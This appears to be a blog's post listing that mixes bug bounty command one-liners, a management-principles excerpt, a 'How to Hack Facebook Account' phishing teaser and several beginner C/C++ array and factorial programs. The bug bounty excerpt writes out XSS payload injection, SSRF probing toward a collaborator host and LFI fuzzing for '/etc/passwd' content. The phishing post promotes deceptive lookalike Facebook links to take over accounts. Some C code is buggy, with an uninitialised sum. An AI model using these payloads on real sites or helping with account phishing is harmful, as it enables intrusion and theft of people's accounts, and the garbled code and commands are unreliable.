Posts

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

Principles Management

 Primary Functions of Management: The management process consists of four primary functions that managers must perform:                                       planning, organizing, leading, and controlling.  Planning: Planning means defining performance goals for the organization and determining what actions and resources are needed to achieve the goals. Through planning, management defines what the future of the organization should be and how to get there. Strategic plans are long-term and affect the entire organization.                                              A strategic plan bridges the gap between what an organization is and what it will become.                                ...

How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack

Image
 How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack  In this article, I am going to show you that how hackers hacked Facebook Account by Advanced Phishing Attack? There is a lot of phishing tricks but these links are block by some official sites. For the Hacking Facebook i create my own scripts for advanced phishing attack on facebook.   My  phishing method will like be Facebook Official link i.e e.g https://www.facebook.com@verify?yxay...... This link is so Awaesome and can't believe someone that it is fake..... so lets start...... In my case  i  perform this attack in Kali Linux. Requirements :  1. Port Forwarding      or 2. Any web Host  so please follow this Video ........ Video link ..........  https://youtu.be/mOAhtsMGwik

How to Find Maximum Grade, Minimum Grade and average using Array in C

  #include <stdio.h> int main(){             int i,max,min,aveg,sum;     int  marks[22]={64,36,56,47,40,54,61,60,58,64,54,48,59,45,63,54,50,49,51,60,58,59}; for ( i=0; i<22; i++) {      max=marks[0];  for( i=0; i<22; i++) {       if(max < marks[i])       max=marks[i];    } min=marks[0]; for( i=0; i<22; i++)   {     if(min>marks[i])     min=marks[i]; }   for (i=0; i<22; i++)        {          sum += marks[i];    }       aveg = sum / 22; printf("The maximum Grade is : %d \n", max); printf("The minimum Grade is : %d \n", min); printf("The Average of the given Grades is : %d \n", aveg); }     return 0; }

How to Find Number of Time Element Found in Array in C

 #include <stdio.h> int main() {          int arr[10], n, i;      int number, count;      printf("Enter elements of the Array : \n");      scanf("%d", &n);      printf("Enter array elements : \n ");      for(i=0; i<n; i++){       printf("Enter Element %d : ", i+1);       scanf("%d", &arr[i]); } printf("Enter value to find number of times element : "); scanf("%d", &number); count=0; for(i=0; i<n; i++){ if(arr[i]==number){ count++; } } printf("Your selected %d element is found in the array %d times \n ",number,count); return 0; }     

How to find index of the Array in C

 #include<stdio.h> int main() {              int i,num,s,flag=0;     int a[10];     printf("How many elements you want to enter :  ");     scanf("%d",&num);     printf("Enter %d elements in the Array ", num);     for(i=0; i<num; i++){     scanf("%d",&a[i]); } printf("Enter the Element you to Search : "); scanf("%d",&s); for(i=0; i<num; i++){ if(a[i]==s){ flag=1; break; } }  if (flag==0){ printf("Not Found "); }else { printf("Element Found "); for(i=0; i<num; i++){ if(a[i]==s) { printf("%d is Present at Location %d \n",s,i+1); break; } } } return 0; }     

Time Calculation || Time Calculator in C

Copy the Source Code and Run on your Editor....  #include <stdio.h> int main() { int Hour; int Minute; int Second; int TotalTimeInSeconds; printf("Enter Seconds\n"); scanf("%d", &Second); printf("Enter Minutes\n"); scanf("%d", &Minute); printf("Enter Hours\n"); scanf("%d", &Hour); printf("Total Time in Seconds is %d",(Hour*60*60)+(Minute*60)+Second); return 0; }

Program to find the factorial of number using function

The program is to find the factorial of number using function. The program is not extendable.  Go enjoy the program. Lets begin…   #include<iostream.h> #include<conio.h> //function prototype int fact(int); //main function void main() { //clear the screen. clrscr(); //declare variables as int. int no,fac; //Input the number and save it in 'no' cout<<"Enter the no."<<endl; cin>>no; //calculate factorial using function. fac=fact(no); //print factorial cout<<"Factorial of "<<no<<" is "<<fac; //get character getch(); } //function int fact(int no) { int i,f=1; for(i=1;i<=no;i++) f=f*i; return(f); }

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack

Bug BOunty Helpful Commands